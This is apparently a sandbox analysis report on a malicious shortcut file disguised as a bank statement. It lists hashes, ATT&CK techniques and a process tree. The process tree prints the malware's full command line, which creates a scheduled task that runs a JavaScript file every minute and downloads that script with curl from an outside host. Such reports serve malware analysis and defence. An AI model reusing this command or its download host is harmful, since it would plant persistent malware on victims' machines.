ec5eef03fe07efe2ca6ed4aa1a68f52cdae2043bdf7b5433dd946bacfb581e97

General

Target

chase_14_06_24_statement.lnk
Size

2KB
MD5

6e46db2bb323d9c90717bc4acede81e1
SHA1

506fb29a25eb35a590eec152c260d783719a85f1
SHA256

95ebb135bedca3d8bc005af49079cc5399ac795aec0df21d0477ccd716d14882
SHA512

eb0e6a6b5b5a15a88c9fe3e8cebbf58617addc8604eb5e2923e78a24407df860f08ecae892b60f2ea8a340211b2474f8d1eb5f28d378cba046693222eaf73083

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

2032 schtasks.exe

pid	process
2032	schtasks.exe

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

cmd.execmd.exetaskeng.exe

description	pid	process	target process
PID 1200 wrote to memory of 2752	1200	cmd.exe	cmd.exe
PID 1200 wrote to memory of 2752	1200	cmd.exe	cmd.exe
PID 1200 wrote to memory of 2752	1200	cmd.exe	cmd.exe
PID 2752 wrote to memory of 2032	2752	cmd.exe	schtasks.exe
PID 2752 wrote to memory of 2032	2752	cmd.exe	schtasks.exe
PID 2752 wrote to memory of 2032	2752	cmd.exe	schtasks.exe
PID 1828 wrote to memory of 736	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 736	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 736	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 1260	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 1260	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 1260	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 1984	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 1984	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 1984	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 672	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 672	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 672	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 1188	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 1188	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 1188	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 3008	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 3008	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 3008	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 1596	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 1596	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 1596	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 2052	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 2052	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 2052	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 2884	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 2884	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 2884	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 1928	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 1928	1828	taskeng.exe	wscript.EXE
PID 1828 wrote to memory of 1928	1828	taskeng.exe	wscript.EXE

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\chase_14_06_24_statement.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1200
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /sc minute /tn i1YsdL7m9k4xOoZ /f /mo 1 /tr "wscript 'C:\Users\Admin\AppData\Local\Temp\U43kOF8PhQeq.js' i1YsdL7m9k4xOoZ" & curl -s -o U43kOF8PhQeq.js -v "https://schermarieti.it/wp-content/uploads/2019/09/incarcerative7iEA.php"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2752
- - C:\Windows\system32\schtasks.exe
    schtasks /create /sc minute /tn i1YsdL7m9k4xOoZ /f /mo 1 /tr "wscript 'C:\Users\Admin\AppData\Local\Temp\U43kOF8PhQeq.js' i1YsdL7m9k4xOoZ"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2032

C:\Windows\system32\taskeng.exe
taskeng.exe {BB0EAE4A-6EC9-46BB-9F02-A97384C93D89} S-1-5-21-39690363-730359138-1046745555-1000:EILATWEW\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1828
- C:\Windows\system32\wscript.EXE
  C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\U43kOF8PhQeq.js" i1YsdL7m9k4xOoZ
  2⤵
  PID:736
- C:\Windows\system32\wscript.EXE
  C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\U43kOF8PhQeq.js" i1YsdL7m9k4xOoZ
  2⤵
  PID:1260
- C:\Windows\system32\wscript.EXE
  C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\U43kOF8PhQeq.js" i1YsdL7m9k4xOoZ
  2⤵
  PID:1984
- C:\Windows\system32\wscript.EXE
  C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\U43kOF8PhQeq.js" i1YsdL7m9k4xOoZ
  2⤵
  PID:672
- C:\Windows\system32\wscript.EXE
  C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\U43kOF8PhQeq.js" i1YsdL7m9k4xOoZ
  2⤵
  PID:1188
- C:\Windows\system32\wscript.EXE
  C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\U43kOF8PhQeq.js" i1YsdL7m9k4xOoZ
  2⤵
  PID:3008
- C:\Windows\system32\wscript.EXE
  C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\U43kOF8PhQeq.js" i1YsdL7m9k4xOoZ
  2⤵
  PID:1596
- C:\Windows\system32\wscript.EXE
  C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\U43kOF8PhQeq.js" i1YsdL7m9k4xOoZ
  2⤵
  PID:2052
- C:\Windows\system32\wscript.EXE
  C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\U43kOF8PhQeq.js" i1YsdL7m9k4xOoZ
  2⤵
  PID:2884
- C:\Windows\system32\wscript.EXE
  C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\U43kOF8PhQeq.js" i1YsdL7m9k4xOoZ
  2⤵
  PID:1928